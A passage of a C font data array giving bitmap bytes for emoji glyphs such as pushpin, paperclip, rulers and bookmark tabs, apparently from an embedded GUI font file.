0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
/* U+1F4CC "📌" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x7c, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7f, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x71, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x1e, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0x7, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x73, 0x0, 0x3c,
0x0, 0x0, 0x0, 0x0, 0x0, 0x71, 0xc0, 0xf,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0xe0, 0x3,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x38, 0x0,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x1c, 0x0,
0x3c, 0x0, 0x0, 0x0, 0x0, 0xe, 0x7, 0x0,
0xf, 0x0, 0x0, 0x0, 0x0, 0x7, 0x81, 0xc0,
0x3, 0x80, 0x0, 0x0, 0x0, 0x1, 0xc0, 0xf0,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0xf0, 0x38,
0x0, 0x78, 0x0, 0x0, 0x0, 0x0, 0x38, 0xe,
0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x1e, 0x3,
0x80, 0x7, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x0,
0xf0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x1d, 0xc0,
0x3c, 0x1, 0xe0, 0x0, 0xf, 0xf8, 0x3c, 0x70,
0xf, 0x0, 0x70, 0x0, 0x1f, 0xff, 0xbc, 0x3c,
0x3, 0xc0, 0x38, 0x0, 0x1e, 0x3, 0xfc, 0xf,
0x0, 0xf8, 0x1c, 0x0, 0x1e, 0x0, 0x3c, 0x3,
0xc0, 0x1f, 0x9e, 0x0, 0xe, 0x0, 0xc, 0x0,
0xf0, 0x7, 0xfe, 0x0, 0x7, 0x0, 0x0, 0x0,
0x3c, 0x0, 0xfe, 0x0, 0x3, 0x80, 0x0, 0x0,
0xf, 0x0, 0xe, 0x0, 0x1, 0xc0, 0x0, 0x0,
0x1, 0xe0, 0xe, 0x0, 0x0, 0xf0, 0x0, 0x0,
0x0, 0x78, 0xe, 0x0, 0x0, 0x38, 0x0, 0x0,
0x0, 0x3f, 0xe, 0x0, 0x0, 0x1c, 0x0, 0x0,
0x0, 0x3d, 0xfe, 0x0, 0x0, 0xf, 0x0, 0x0,
0x0, 0x3c, 0x3e, 0x0, 0x0, 0x3, 0x80, 0x0,
0x0, 0x38, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x0,
0x0, 0x38, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0,
0x0, 0x38, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x0,
0x0, 0x18, 0x0, 0x0, 0x0, 0x0, 0x7, 0x0,
0x0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x0, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x3c,
0x0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x3f,
0x0, 0x0, 0x38, 0x0, 0x0, 0x0, 0x0, 0x3f,
0xc0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x3c,
0xf0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x3c,
0x3c, 0x0, 0x7, 0x0, 0x0, 0x0, 0x0, 0x3c,
0x3f, 0x0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x3c,
0x3f, 0xc0, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x38,
0x3c, 0x70, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x38,
0x3c, 0x1e, 0x0, 0x70, 0x0, 0x0, 0x0, 0x38,
0x3c, 0x7, 0xc0, 0x70, 0x0, 0x0, 0x0, 0x38,
0x3c, 0x0, 0xf8, 0x78, 0x0, 0x0, 0x0, 0x38,
0x3c, 0x0, 0x1f, 0xf8, 0x0, 0x0, 0x0, 0x38,
0x3c, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0, 0x38,
0x3c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38,
0x3c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c,
0x3c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x3c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x3c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x7c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x78, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe,
0x78, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x60, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
/* U+1F4CD "📍" */
0x0, 0xf, 0xf8, 0x0, 0x0, 0x3f, 0xff, 0x80,
0x0, 0x3f, 0xff, 0xe0, 0x0, 0x7f, 0xff, 0xfc,
0x0, 0x7f, 0xff, 0xff, 0x0, 0x7f, 0x9f, 0xff,
0xc0, 0x7f, 0x7, 0xff, 0xf0, 0x7f, 0x87, 0xff,
0xf8, 0x3f, 0xef, 0xff, 0xfe, 0x3f, 0x3f, 0xff,
0xff, 0x9f, 0x1f, 0xff, 0xff, 0xcf, 0x8f, 0xff,
0xff, 0xef, 0x8f, 0xff, 0xff, 0xff, 0xc7, 0xff,
0xff, 0xff, 0xe3, 0xff, 0xff, 0xff, 0xf3, 0xff,
0xff, 0xff, 0xf9, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf7, 0xff, 0xff, 0xff, 0xf3, 0xff,
0xff, 0xff, 0xf9, 0xff, 0xff, 0xff, 0xfc, 0x7f,
0xff, 0xff, 0xfc, 0x3f, 0xff, 0xff, 0xfc, 0xf,
0xff, 0xff, 0xfe, 0x3, 0xff, 0xff, 0xfe, 0x0,
0xff, 0xff, 0xfe, 0x0, 0x3f, 0xff, 0xfe, 0x0,
0x7, 0xff, 0xfc, 0x0, 0x1, 0xff, 0xfc, 0x0,
0x0, 0x1f, 0xf0, 0x0, 0x0, 0xe, 0x38, 0x0,
0x0, 0x7, 0x1c, 0x0, 0x0, 0x3, 0x8e, 0x0,
0x0, 0x1, 0xc7, 0x0, 0x0, 0x0, 0xe3, 0x80,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x38, 0xe0,
0x0, 0x0, 0x1c, 0x70, 0x0, 0x0, 0xe, 0x38,
0x0, 0x0, 0x7, 0x1c, 0x0, 0x0, 0x3, 0x8e,
0x0, 0x0, 0x1, 0xc7, 0x0, 0x0, 0x0, 0xe3,
0x80, 0x0, 0x0, 0x71, 0xc0, 0x0, 0x0, 0x38,
0xe0, 0x0, 0x0, 0x1c, 0x70, 0x0, 0x0, 0xe,
0x38, 0x0, 0x0, 0x7, 0x1c, 0x0, 0x0, 0x3,
0x8e, 0x0, 0x0, 0x1, 0xc7, 0x0, 0x0, 0x0,
0xe3, 0x80, 0x0, 0x0, 0x31, 0x80, 0x0, 0x0,
0x18, 0xc0, 0x0, 0x0, 0xc, 0x60, 0x0, 0x0,
0x7, 0x70, 0x0, 0x0, 0x3, 0xb8, 0x0, 0x0,
0x1, 0xdc, 0x0, 0x0, 0x0, 0xee, 0x0, 0x0,
0x0, 0x36, 0x0, 0x0, 0x0, 0x1b, 0x0, 0x0,
0x0, 0xf, 0x80, 0x0, 0x0, 0x7, 0xc0, 0x0,
/* U+1F4CE "📎" */
0x0, 0x1f, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1e, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xe0, 0x1, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x0, 0x3, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x70, 0x0, 0x7, 0x80,
0x0, 0x0, 0x0, 0x0, 0x1, 0x80, 0x0, 0xf,
0x0, 0x20, 0x0, 0x0, 0x0, 0xc, 0x3, 0xf0,
0x1e, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x70, 0x3f,
0xf0, 0x3c, 0xf, 0x80, 0x0, 0x0, 0x1, 0x81,
0xe0, 0xe0, 0x78, 0x77, 0x0, 0x0, 0x0, 0x6,
0xf, 0x1, 0xc0, 0xf3, 0x8e, 0x0, 0x0, 0x0,
0x30, 0x38, 0x3, 0x81, 0xfc, 0x1c, 0x0, 0x0,
0x0, 0xc1, 0xc0, 0x7, 0x3, 0xe0, 0x38, 0x0,
0x0, 0x3, 0x7, 0x0, 0xe, 0x7, 0xc0, 0x70,
0x0, 0x0, 0xc, 0x1c, 0x0, 0x1c, 0xf, 0x80,
0xe0, 0x0, 0x0, 0x30, 0x70, 0x0, 0x38, 0x1f,
0x1, 0xc0, 0x0, 0x0, 0xc1, 0xc0, 0x0, 0x70,
0x3e, 0x3, 0x80, 0x0, 0x3, 0x7, 0x80, 0x0,
0xe0, 0x7c, 0x7, 0x0, 0x0, 0xe, 0xf, 0x0,
0x1, 0xc0, 0xf8, 0xe, 0x0, 0x0, 0x18, 0x3c,
0x0, 0x3, 0x81, 0xf0, 0x1c, 0x0, 0x0, 0x60,
0x78, 0x0, 0x7, 0x3, 0xe0, 0x38, 0x0, 0x1,
0xc0, 0xf0, 0x6, 0xe, 0x7, 0xc0, 0x70, 0x0,
0x3, 0x81, 0xe0, 0x3c, 0x3c, 0xf, 0x80, 0xe0,
0x0, 0x6, 0x3, 0xc1, 0xf8, 0x78, 0x1f, 0x1,
0xc0, 0x0, 0x1c, 0x7, 0x8e, 0x70, 0xf0, 0x3e,
0x3, 0x80, 0x0, 0x38, 0xf, 0x70, 0xe1, 0xe0,
0x7c, 0x7, 0x0, 0x0, 0x70, 0x1f, 0xc1, 0xc3,
0xc0, 0xf8, 0xe, 0x0, 0x0, 0xe0, 0x3e, 0x3,
0x87, 0x81, 0xf0, 0x3c, 0x0, 0x1, 0xc0, 0x7c,
0x7, 0xf, 0x3, 0xe0, 0x78, 0x0, 0x3, 0x80,
0xf8, 0xe, 0x1e, 0x7, 0xc0, 0xf0, 0x0, 0x7,
0x1, 0xf0, 0x1c, 0x3c, 0xf, 0x81, 0xe0, 0x0,
0xe, 0x3, 0xe0, 0x38, 0x78, 0x3f, 0x3, 0xc0,
0x0, 0x1c, 0x7, 0xc0, 0x60, 0xf0, 0x7e, 0x7,
0x80, 0x0, 0x38, 0xf, 0x80, 0xc1, 0xe1, 0xfc,
0xf, 0x0, 0x0, 0x70, 0x1f, 0x1, 0x83, 0x87,
0x78, 0x1e, 0x0, 0x0, 0xe0, 0x3e, 0x3, 0xe,
0x1c, 0xf0, 0x38, 0x0, 0x1, 0xc0, 0x7c, 0x6,
0x38, 0x71, 0xe0, 0x70, 0x0, 0x3, 0x80, 0xf0,
0xf, 0xc1, 0xc3, 0xc1, 0xc0, 0x0, 0x7, 0x1,
0xe0, 0x1e, 0xe, 0x7, 0x83, 0x80, 0x0, 0xe,
0x3, 0xc0, 0x0, 0x38, 0xf, 0xe, 0x0, 0x0,
0x1c, 0x7, 0x80, 0x1, 0xc0, 0x1c, 0x38, 0x0,
0x0, 0x38, 0xf, 0x0, 0xf, 0x0, 0x70, 0x70,
0x0, 0x0, 0x70, 0x1f, 0x0, 0x78, 0x0, 0xe1,
0xc0, 0x0, 0x0, 0xe0, 0x3f, 0x7, 0xc0, 0x3,
0x87, 0x0, 0x0, 0x1, 0xc0, 0x7f, 0xfc, 0x0,
0xe, 0x1c, 0x0, 0x0, 0x3, 0x80, 0xff, 0xc0,
0x0, 0x38, 0x70, 0x0, 0x0, 0x7, 0x1, 0xe0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0xe, 0x3,
0x80, 0x0, 0x3, 0x87, 0x0, 0x0, 0x0, 0x1c,
0x7, 0x0, 0x0, 0x1c, 0x1c, 0x0, 0x0, 0x0,
0x38, 0xe, 0x0, 0x0, 0x70, 0xe0, 0x0, 0x0,
0x0, 0x70, 0x1c, 0x0, 0x3, 0xc3, 0x80, 0x0,
0x0, 0x0, 0xe0, 0x38, 0x0, 0xe, 0xe, 0x0,
0x0, 0x0, 0x1, 0xc0, 0x70, 0x0, 0x70, 0x70,
0x0, 0x0, 0x0, 0x3, 0x80, 0xf0, 0x3, 0x81,
0xc0, 0x0, 0x0, 0x0, 0x7, 0x1, 0xf0, 0x7c,
0xe, 0x0, 0x0, 0x0, 0x0, 0xe, 0x1, 0xff,
0xe0, 0x78, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x1,
0xfc, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x38,
0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf0, 0x0, 0x7, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x0, 0x7c, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xf0, 0xf, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xff, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0x80, 0x0,
/* U+1F4CF "📏" */
0x0, 0x6, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xb8, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x8e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x83, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x80, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x80, 0x38, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x80, 0x3e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x80, 0x3b, 0x80, 0x0, 0x0, 0x0,
0x0, 0x7, 0x80, 0x38, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x80, 0x8, 0x38, 0x0, 0x0, 0x0,
0x0, 0x7, 0x80, 0x0, 0x1e, 0x0, 0x0, 0x0,
0x0, 0x7, 0x80, 0x0, 0x1f, 0x80, 0x0, 0x0,
0x0, 0x1, 0xc0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x70, 0x0, 0x1c, 0x38, 0x0, 0x0,
0x0, 0x0, 0x1c, 0x0, 0x1c, 0xe, 0x0, 0x0,
0x0, 0x0, 0x7, 0x0, 0x4, 0xf, 0x80, 0x0,
0x0, 0x0, 0x1, 0xc0, 0x0, 0xe, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x70, 0x0, 0xe, 0x38, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x0, 0x2, 0xe, 0x0,
0x0, 0x0, 0x0, 0x7, 0x0, 0x0, 0x7, 0x80,
0x0, 0x0, 0x0, 0x1, 0xc0, 0x0, 0x7, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x70, 0x0, 0x7, 0xb8,
0x0, 0x0, 0x0, 0x0, 0x1c, 0x0, 0x7, 0x8e,
0x0, 0x0, 0x0, 0x0, 0x7, 0x0, 0x7, 0x83,
0x80, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x1, 0x81,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x0, 0x1,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x0, 0x1,
0xce, 0x0, 0x0, 0x0, 0x0, 0x7, 0x0, 0x0,
0xc3, 0x80, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x0,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x0,
0x0, 0xee, 0x0, 0x0, 0x0, 0x0, 0x7, 0x0,
0x0, 0xe3, 0x80, 0x0, 0x0, 0x0, 0x1, 0xc0,
0x0, 0xe0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x60, 0x38, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x3e, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x33, 0x80, 0x0, 0x0, 0x0, 0x1,
0xc0, 0x0, 0x30, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x0, 0x38, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x1c, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x70, 0x0, 0x1c, 0x38, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x0, 0x1c, 0xe, 0x0, 0x0, 0x0,
0x0, 0x7, 0x0, 0x4, 0xf, 0x80, 0x0, 0x0,
0x0, 0x1, 0xc0, 0x0, 0xe, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x70, 0x0, 0xe, 0x38, 0x0, 0x0,
0x0, 0x0, 0x1c, 0x0, 0x2, 0xe, 0x0, 0x0,
0x0, 0x0, 0x7, 0x0, 0x0, 0x3, 0x80, 0x0,
0x0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x7, 0x0, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xc0, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x70, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x60, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0,
/* U+1F4D0 "📐" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x20, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xf, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0xb8, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe7, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x38, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x83, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe0, 0x70, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x38, 0xe, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x1, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x80, 0x78, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe0, 0x3f, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x38, 0x1c, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x6, 0x1e, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0x80, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x0, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x7f,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x0, 0x39,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3, 0x80, 0x3c,
0x3c, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0xe,
0x7, 0x80, 0x0, 0x0, 0x0, 0x0, 0x38, 0x1,
0x3, 0xf0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x0,
0x1, 0xde, 0x0, 0x0, 0x0, 0x0, 0x3, 0x80,
0x0, 0xe3, 0xc0, 0x0, 0x0, 0x0, 0x0, 0xe0,
0x0, 0x10, 0x78, 0x0, 0x0, 0x0, 0x0, 0x38,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x0, 0xe,
0x0, 0x0, 0xf, 0xe0, 0x0, 0x0, 0x0, 0x3,
0x80, 0x0, 0x7, 0xbc, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x0, 0x3, 0xc7, 0x80, 0x0, 0x0, 0x0,
0x38, 0x0, 0x1, 0xe0, 0xf0, 0x0, 0x0, 0x0,
0xe, 0x0, 0x0, 0x30, 0x3e, 0x0, 0x0, 0x0,
0x3, 0x80, 0xc, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0xe0, 0x3, 0x80, 0xe, 0x78, 0x0, 0x0,
0x0, 0x38, 0x0, 0xf0, 0x3, 0xf, 0x0, 0x0,
0x0, 0xe, 0x0, 0x3e, 0x0, 0x1, 0xe0, 0x0,
0x0, 0x3, 0x80, 0xf, 0xc0, 0x0, 0xfc, 0x0,
0x0, 0x0, 0xe0, 0x3, 0xf8, 0x0, 0x77, 0x80,
0x0, 0x0, 0x38, 0x0, 0xef, 0x0, 0x38, 0xf0,
0x0, 0x0, 0xe, 0x0, 0x39, 0xe0, 0x1c, 0x1e,
0x0, 0x0, 0x3, 0x80, 0xe, 0x3c, 0x6, 0x7,
0xc0, 0x0, 0x0, 0xe0, 0x3, 0x87, 0x80, 0x3,
0xf8, 0x0, 0x0, 0x38, 0x0, 0xe0, 0xf0, 0x1,
0xcf, 0x0, 0x0, 0xe, 0x0, 0x38, 0x1e, 0x0,
0x61, 0xe0, 0x0, 0x3, 0x80, 0xe, 0x3, 0xc0,
0x0, 0x3c, 0x0, 0x0, 0xe0, 0x3, 0x80, 0x78,
0x0, 0x1f, 0x80, 0x0, 0x38, 0x0, 0xff, 0xff,
0x0, 0xf, 0x70, 0x0, 0xe, 0x0, 0x3f, 0xff,
0xe0, 0x7, 0x8e, 0x0, 0x3, 0x80, 0x0, 0x0,
0x0, 0x3, 0x81, 0xc0, 0x0, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x40, 0x78, 0x0, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x37, 0x0, 0xe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x18, 0xf0, 0x3, 0x80, 0x0,
0x0, 0x0, 0x0, 0x4, 0x1e, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xc0, 0x38, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x78, 0xe, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0x3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xe0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x8e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf3,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xc0,
/* U+1F4D1 "📑" */
0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0x7f,
0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x38, 0x0,
0x0, 0x0, 0x0, 0x1, 0x80, 0x1c, 0x0, 0x0,
0x0, 0x0, 0x0, 0xc0, 0xe, 0x0, 0x0, 0x0,
0x0, 0x0, 0x60, 0x7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x30, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x1f, 0xf1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0xf,
0xf8, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x6, 0x1c,
0x70, 0x0, 0x0, 0x0, 0x0, 0x3, 0xe, 0x38,
0x0, 0x0, 0x0, 0x0, 0x1, 0x87, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x0, 0xc3, 0x8e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x61, 0xc7, 0x3, 0xff, 0xff,
0xff, 0x81, 0xff, 0xff, 0x81, 0xff, 0xff, 0xff,
0xc1, 0xff, 0xff, 0xc0, 0xff, 0xff, 0xff, 0xe1,
0xff, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0xff,
0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xff,
0xf8, 0x0, 0x0, 0x0, 0x0, 0xf, 0xff, 0xfc,
0x0, 0x0, 0x0, 0x0, 0x0, 0xc3, 0x8e, 0x0,
0x0, 0x0, 0x0, 0x0, 0x61, 0xc7, 0x3, 0xff,
0xff, 0xff, 0x80, 0x30, 0xe3, 0x81, 0xff, 0xff,
0xff, 0xc0, 0x18, 0x71, 0xc0, 0x0, 0x0, 0x0,
0x0, 0xf, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x3,
0xff, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff,
0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xfe,
0x7, 0xff, 0xff, 0xff, 0x0, 0x7f, 0xff, 0x3,
0xff, 0xff, 0xff, 0x80, 0x30, 0xe3, 0x80, 0x0,
0x0, 0x0, 0x0, 0x18, 0x71, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xc, 0x38, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x6, 0x1c, 0x70, 0x0, 0x0, 0x0, 0x0,
0x1f, 0xff, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x1f,
0xff, 0xfc, 0xf, 0xff, 0xff, 0xfe, 0x1f, 0xff,
0xfe, 0x7, 0xff, 0xff, 0xff, 0xf, 0xff, 0xff,
0x3, 0xff, 0xff, 0xff, 0x83, 0xff, 0xff, 0x80,
0x0, 0x0, 0x0, 0x0, 0xff, 0xff, 0xc0, 0x0,
0x0, 0x0, 0x0, 0xc, 0x38, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x6, 0x1c, 0x70, 0x0, 0x0, 0x0,
0x0, 0x3, 0xe, 0x38, 0x0, 0x0, 0x0, 0x0,
0x1, 0x87, 0x1c, 0xf, 0xff, 0xc0, 0x0, 0x0,
0xff, 0xfe, 0x7, 0xff, 0xe0, 0x0, 0x0, 0x7f,
0xff, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xff, 0xc0,
0x0, 0x0, 0x0, 0x0, 0xf, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xff, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xe, 0x38, 0x0, 0x0, 0x0,
0x0, 0x1, 0x87, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x0, 0xc3, 0x8e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x61, 0xc7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x30,
0xe3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x71,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x38, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfe, 0x1c, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0xe, 0x0, 0x70, 0x0,
0x0, 0x0, 0x0, 0x7, 0x0, 0x38, 0x0, 0x0,
